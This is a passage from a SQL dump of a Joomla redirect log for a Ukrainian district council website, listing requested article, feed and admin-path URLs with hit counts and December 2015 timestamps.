00:00:00',301),(22352,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11&lang=en&Itemid=','','','',3,0,'2015-12-22 15:49:35','0000-00-00 00:00:00',301),(22353,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11&lang=ru','','','',3,0,'2015-12-22 15:49:42','0000-00-00 00:00:00',301),(22354,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=en','','','',3,0,'2015-12-22 15:49:45','0000-00-00 00:00:00',301),(22355,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11&lang=ru&Itemid=','','','',3,0,'2015-12-22 15:49:46','0000-00-00 00:00:00',301),(22356,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=ru','','','',3,0,'2015-12-22 15:49:47','0000-00-00 00:00:00',301),(22357,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=279:2011-03-31-08-20-23&catid=11&lang=uk&Itemid=','','','',3,0,'2015-12-22 15:49:52','0000-00-00 00:00:00',301),(22358,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:50:00','0000-00-00 00:00:00',301),(22359,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:50:02','0000-00-00 00:00:00',301),(22360,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&lang=en','','','',5,0,'2015-12-22 15:50:03','0000-00-00 00:00:00',301),(22361,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:50:04','0000-00-00 00:00:00',301),(22362,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:50:07','0000-00-00 00:00:00',301),(22363,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:50:11','0000-00-00 00:00:00',301),(22364,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&lang=en&Itemid=','','','',5,0,'2015-12-22 15:50:13','0000-00-00 00:00:00',301),(22365,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:50:13','0000-00-00 00:00:00',301),(22366,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:50:16','0000-00-00 00:00:00',301),(22367,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&lang=ru','','','',5,0,'2015-12-22 15:50:21','0000-00-00 00:00:00',301),(22368,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:50:26','0000-00-00 00:00:00',301),(22369,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:50:29','0000-00-00 00:00:00',301),(22370,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:50:31','0000-00-00 00:00:00',301),(22371,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:50:34','0000-00-00 00:00:00',301),(22372,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&lang=ru&Itemid=','','','',5,0,'2015-12-22 15:50:35','0000-00-00 00:00:00',301),(22373,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:50:41','0000-00-00 00:00:00',301),(22374,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&lang=uk','','','',5,0,'2015-12-22 15:50:41','0000-00-00 00:00:00',301),(22375,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:-qq&catid=15&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:50:44','0000-00-00 00:00:00',301),(22376,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=367:-1620-19072011-&catid=11&lang=uk&Itemid=','','','',5,0,'2015-12-22 15:50:45','0000-00-00 00:00:00',301),(22377,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:50:49','0000-00-00 00:00:00',301),(22378,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:50:51','0000-00-00 00:00:00',301),(22379,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:-qq&catid=15&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:50:55','0000-00-00 00:00:00',301),(22380,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:50:58','0000-00-00 00:00:00',301),(22381,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:51:00','0000-00-00 00:00:00',301),(22382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:-qq&catid=15&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:51:03','0000-00-00 00:00:00',301),(22383,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:-qq&catid=15&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:51:06','0000-00-00 00:00:00',301),(22384,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=en&Itemid=0','','','',3,0,'2015-12-22 15:51:16','0000-00-00 00:00:00',301),(22385,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=ru&Itemid=0','','','',3,0,'2015-12-22 15:51:24','0000-00-00 00:00:00',301),(22386,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=uk&Itemid=0','','','',3,0,'2015-12-22 15:51:27','0000-00-00 00:00:00',301),(22387,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=713:2012-06-14-15-13-57&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-22 18:12:23','0000-00-00 00:00:00',301),(22388,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1014:2013-06-03-06-43-44&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-22 18:13:27','0000-00-00 00:00:00',301),(22389,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=580:-l-r-2012-2016-&Itemid=77&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 18:14:04','0000-00-00 00:00:00',301),(22390,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=800:-l-r&Itemid=84&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 18:15:09','0000-00-00 00:00:00',301),(22391,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=759:2012-09-14-08-35-05&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 18:23:49','0000-00-00 00:00:00',301),(22393,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=832:-9-2012-&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 18:26:54','0000-00-00 00:00:00',301),(22394,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=201:--------l-r--2011--&catid=29&Itemid=60&lang=uk','','','',1,0,'2015-12-22 18:29:03','0000-00-00 00:00:00',301),(22395,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1108:-24-&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 18:32:08','0000-00-00 00:00:00',301),(22396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&catid=38&Itemid=73&lang=ru','','','',1,0,'2015-12-22 18:35:07','0000-00-00 00:00:00',301),(22397,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46&layout=blog&Itemid=85&lang=uk&limitstart=15','','','',1,0,'2015-12-22 18:43:43','0000-00-00 00:00:00',301),(22398,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=764:2012-09-26-12-58-07&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 18:44:04','0000-00-00 00:00:00',301),(22399,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=547:-l-r-2011-2016-&Itemid=76&lang=en&option=com_content&view=article','','','',3,0,'2015-12-22 18:56:10','0000-00-00 00:00:00',301),(22400,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1092:2013-09-19-12-18-37&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 18:59:23','0000-00-00 00:00:00',301),(22401,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=912:2013-01-22-14-14-06&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 18:59:48','0000-00-00 00:00:00',301),(22402,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1171:2014-01-11-09-58-40&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 19:00:14','0000-00-00 00:00:00',301),(22403,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1078:-2007-2015-&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 19:02:31','0000-00-00 00:00:00',301),(22404,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=869:2012-12-16-16-05-45&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 19:05:39','0000-00-00 00:00:00',301),(22405,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=481:-2012-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-22 19:09:55','0000-00-00 00:00:00',301),(22406,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=692:-2012&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-22 19:13:13','0000-00-00 00:00:00',301),(22407,'http://www.malyn-rayrada.org.ua/index.php?catid=55:--26122013-&id=1167:--------l-r-------&Itemid=96&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 19:13:27','0000-00-00 00:00:00',301),(22408,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1152:2013-11-28-14-58-05&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 19:16:01','0000-00-00 00:00:00',301),(22409,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=713:2012-06-14-15-13-57&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 19:24:48','0000-00-00 00:00:00',301),(22410,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=489:2011-12-02-06-51-07&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 19:25:40','0000-00-00 00:00:00',301),(22411,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=530:-4050-vi-l-r-1-2013-&catid=11&Itemid=14&lang=uk','','','',2,0,'2015-12-22 19:26:26','0000-00-00 00:00:00',301),(22412,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1093:------------2017-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 19:30:39','0000-00-00 00:00:00',301),(22413,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=329:2011-05-20-16-25-10&Itemid=66&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 19:37:49','0000-00-00 00:00:00',301),(22414,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=367:-1620-19072011-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-22 19:42:10','0000-00-00 00:00:00',301),(22415,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&lang=en&option=com_content&view=article','','','',3,0,'2015-12-22 19:51:06','0000-00-00 00:00:00',301),(22416,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=665:-75-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 20:03:35','0000-00-00 00:00:00',301),(22417,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1089:--------l---r---&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 20:06:16','0000-00-00 00:00:00',301),(22418,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=600:2012-03-01-06-12-24&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-22 20:25:24','0000-00-00 00:00:00',301),(22419,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=822:----------2012--2013-----------------l-r&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-22 20:37:45','0000-00-00 00:00:00',301),(22420,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=452:-20-2011-100-l-r-&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 20:39:26','0000-00-00 00:00:00',301),(22421,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:--24--6-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-22 20:42:05','0000-00-00 00:00:00',301),(22422,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=207:2010-12-15-14-22-39&Itemid=60&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 20:43:06','0000-00-00 00:00:00',301),(22423,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=688:2012-05-25-16-34-51&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 20:43:21','0000-00-00 00:00:00',301),(22424,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1147:2013-11-28-09-57-12&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-22 21:01:59','0000-00-00 00:00:00',301),(22425,'http://www.malyn-rayrada.org.ua/index.php/1131-granitnenska-selishchna-rada-informue?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-22 21:02:40','0000-00-00 00:00:00',301),(22426,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1137:2013-11-15-13-07-04&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-22 21:06:30','0000-00-00 00:00:00',301),(22427,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=924:2013-02-20-19-06-08&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-22 21:24:34','0000-00-00 00:00:00',301),(22428,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1142:-l-r-&Itemid=95&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 21:25:01','0000-00-00 00:00:00',301),(22429,'http://www.malyn-rayrada.org.ua/index.php?id=42&Itemid=80&lang=ru&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-22 21:25:50','0000-00-00 00:00:00',301),(22430,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=272:-2010-&Itemid=62&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 21:43:56','0000-00-00 00:00:00',301),(22431,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-22 21:52:00','0000-00-00 00:00:00',301),(22432,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2015-12-22 21:55:27','0000-00-00 00:00:00',301),(22433,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:-qq&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 22:03:48','0000-00-00 00:00:00',301),(22434,'http://www.malyn-rayrada.org.ua/index.php?catid=54&id=1151:2013-11-28-14-54-33&Itemid=95&lang=en&option=com_content&view=article','','','',1,0,'2015-12-22 22:05:49','0000-00-00 00:00:00',301),(22435,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=793:2012-10-17-06-29-27&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 22:06:37','0000-00-00 00:00:00',301),(22436,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=331:2011-05-20-16-30-09&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-22 22:07:06','0000-00-00 00:00:00',301),(22437,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=758:--15---&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-22 22:07:47','0000-00-00 00:00:00',301),(22438,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1205:2014-01-31-07-53-03&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-22 22:08:08','0000-00-00 00:00:00',301),(22439,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=733:-10-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 22:08:22','0000-00-00 00:00:00',301),(22440,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=735:2012-07-18-13-32-43&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-22 22:17:29','0000-00-00 00:00:00',301),(22441,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=925:-l-r-&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 22:21:55','0000-00-00 00:00:00',301),(22442,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 22:25:51','0000-00-00 00:00:00',301),(22443,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=646:2012-04-08-07-58-55&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-22 23:01:45','0000-00-00 00:00:00',301),(22444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=347:2011-06-15-12-33-18&catid=34:--15062011-&Itemid=68&lang=uk','','','',4,0,'2015-12-22 23:08:04','0000-00-00 00:00:00',301),(22445,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1097:2013-09-25-08-35-50&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 23:14:05','0000-00-00 00:00:00',301),(22446,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=929:2013-02-21-09-11-26&Itemid=86&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-22 23:28:38','0000-00-00 00:00:00',301),(22447,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1121:-24-6-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-23 00:04:34','0000-00-00 00:00:00',301),(22448,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=407:-l-r-2010-2015-&Itemid=72&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-23 00:18:43','0000-00-00 00:00:00',301),(22449,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-23 00:29:21','0000-00-00 00:00:00',301),(22450,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1070:2013-08-23-04-27-00&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-23 00:59:31','0000-00-00 00:00:00',301),(22451,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=748:2012-08-12-17-56-55&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-23 01:04:47','0000-00-00 00:00:00',301),(22452,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=962:-2017-&Itemid=88&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-23 01:18:47','0000-00-00 00:00:00',301),(22453,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=608:2012-03-15-08-40-03&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2015-12-23 01:20:50','0000-00-00 00:00:00',301),(22454,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=749:2012-08-24-05-59-17&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-23 01:24:02','0000-00-00 00:00:00',301),(22455,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1328:2014-06-01-11-58-56&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-23 01:24:58','0000-00-00 00:00:00',301),(22456,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=610:2012-03-23-06-34-31&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-23 01:27:37','0000-00-00 00:00:00',301),(22457,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1204:2014-01-31-07-51-23&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-23 01:30:04','0000-00-00 00:00:00',301),(22458,'http://malyn-rayrada.org.ua/a','','','',3,0,'2015-12-25 07:21:04','0000-00-00 00:00:00',301),(22459,'http://malyn-rayrada.org.ua/admi','','','',1,0,'2015-12-25 07:21:05','0000-00-00 00:00:00',301),(22460,'http://malyn-rayrada.org.ua/admin','','','',1,0,'2015-12-25 07:21:05','0000-00-00 00:00:00',301),(22461,'http://malyn-rayrada.org.ua/admini','','','',1,0,'2015-12-25 07:21:06','0000-00-00 00:00:00',301),(22462,'http://malyn-rayrada.org.ua/adminis','','','',1,0,'2015-12-25 07:21:06','0000-00-00 00:00:00',301),(22463,'http://malyn-rayrada.org.ua/administ','','','',1,0,'2015-12-25 07:21:07','0000-00-00 00:00:00',301),(22464,'http://malyn-rayrada.org.ua/administra','','','',1,0,'2015-12-25 07:21:07','0000-00-00 00:00:00',301),(22465,'http://malyn-rayrada.org.ua/administrat','','','',1,0,'2015-12-25 07:21:07','0000-00-00 00:00:00',301),(22466,'http://malyn-rayrada.org.ua/administrato','','','',1,0,'2015-12-25 07:21:07','0000-00-00 00:00:00',301),(22467,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku','','','',2,0,'2015-12-25 07:39:49','0000-00-00 00:00:00',301),(22468,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1300-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-iz-zemleustroyu-shchodo-vnesennya-zmin-v-proekt-formuvannya-teritoriji-i-vstanovlennya-mezh-slobidskoji','','','',1,0,'2015-12-25 08:34:05','0000-00-00 00:00:00',301),(22469,'http://malyn-rayrada.org.ua/index.php/1297-urochistosti-iz-nagodi-25-richchya-pfu','','','',1,0,'2015-12-25 08:57:22','0000-00-00 00:00:00',301),(22470,'http://malyn-rayrada.org.ua/index.php/1303-prijnyato-rajonnij-byudzhet-na-2016-rik','','','',1,0,'2015-12-25 08:57:24','0000-00-00 00:00:00',301),(22471,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1299-pro-rajonnij-byudzhet-na-2016-rik','','','',1,0,'2015-12-25 08:57:25','0000-00-00 00:00:00',301),(22472,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1301-pro-inventarizatsiyu-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu','','','',1,0,'2015-12-25 08:57:27','0000-00-00 00:00:00',301),(22473,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1302-pro-rozglyad-klopotan-shchodo-pripinennya-prava-koristuvannya-mislivskimi-ugiddyami-tov-svit-progresivnikh-tekhnologij','','','',2,0,'2015-12-25 08:57:29','0000-00-00 00:00:00',301),(22474,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku','','','',1,0,'2015-12-25 08:57:30','0000-00-00 00:00:00',301),(22475,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1294:pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',2,0,'2015-12-25 09:03:58','0000-00-00 00:00:00',301),(22476,'http://www.malyn-rayrada.org.ua/index.php?Itemid=109','','','',22,0,'2015-12-25 09:07:14','0000-00-00 00:00:00',301),(22477,'http://www.malyn-rayrada.org.ua/index.php?Itemid=245','','','',24,0,'2015-12-25 09:07:15','0000-00-00 00:00:00',301),(22478,'http://www.malyn-rayrada.org.ua/index.php?Itemid=246','','','',23,0,'2015-12-25 09:07:17','0000-00-00 00:00:00',301),(22479,'http://www.malyn-rayrada.org.ua/index.php?Itemid=247','','','',23,0,'2015-12-25 09:07:17','0000-00-00 00:00:00',301),(22480,'http://www.malyn-rayrada.org.ua/index.php/1303-prijnyato-rajonnij-byudzhet-na-2016-rik','','https://www.google.com.ua/','',2,0,'2015-12-25 09:34:43','0000-00-00 00:00:00',301),(22481,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=509:2011-12-20-08-03-11&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2015-12-25 09:40:26','0000-00-00 00:00:00',301),(22484,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=2&format=feed&type=rss','','','',1,0,'2015-12-25 10:30:45','0000-00-00 00:00:00',301),(22485,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=2&format=feed&type=atom','','','',1,0,'2015-12-25 10:30:53','0000-00-00 00:00:00',301),(22486,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=3&format=feed&type=rss','','','',1,0,'2015-12-25 11:19:18','0000-00-00 00:00:00',301),(22487,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?format=feed&type=rss','','','',1,0,'2015-12-25 11:19:31','0000-00-00 00:00:00',301),(22488,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?format=feed&type=atom','','','',1,0,'2015-12-25 11:19:37','0000-00-00 00:00:00',301),(22489,'http://malyn-rayrada.org.ua/index.php/1297-urochistosti-iz-nagodi-25-richchya-pfu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-12-25 11:22:10','0000-00-00 00:00:00',301),(22490,'http://malyn-rayrada.org.ua/index.php/1303-prijnyato-rajonnij-byudzhet-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-12-25 11:22:11','0000-00-00 00:00:00',301),(22491,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1298-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',1,0,'2015-12-25 11:22:33','0000-00-00 00:00:00',301),(22492,'http://www.malyn-rayrada.org.ua/index.php/1297-urochistosti-iz-nagodi-25-richchya-pfu','','','',1,0,'2015-12-25 11:22:39','0000-00-00 00:00:00',301),(22493,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku','','','',5,0,'2015-12-25 11:27:24','0000-00-00 00:00:00',301),(22494,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1298-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',2,0,'2015-12-25 11:28:41','0000-00-00 00:00:00',301),(22495,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1299-pro-rajonnij-byudzhet-na-2016-rik','','','',1,0,'2015-12-25 11:28:44','0000-00-00 00:00:00',301),(22496,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1301-pro-inventarizatsiyu-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu','','','',1,0,'2015-12-25 11:28:45','0000-00-00 00:00:00',301),(22497,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1302-pro-rozglyad-klopotan-shchodo-pripinennya-prava-koristuvannya-mislivskimi-ugiddyami-tov-svit-progresivnikh-tekhnologij','','','',1,0,'2015-12-25 11:28:47','0000-00-00 00:00:00',301),(22498,'http://www.malyn-rayrada.org.ua/plugins/system/jcemediabox/themes/standard/tooltip.html','','http://www.malyn-rayrada.org.ua/','',22,0,'2015-12-25 11:34:00','0000-00-00 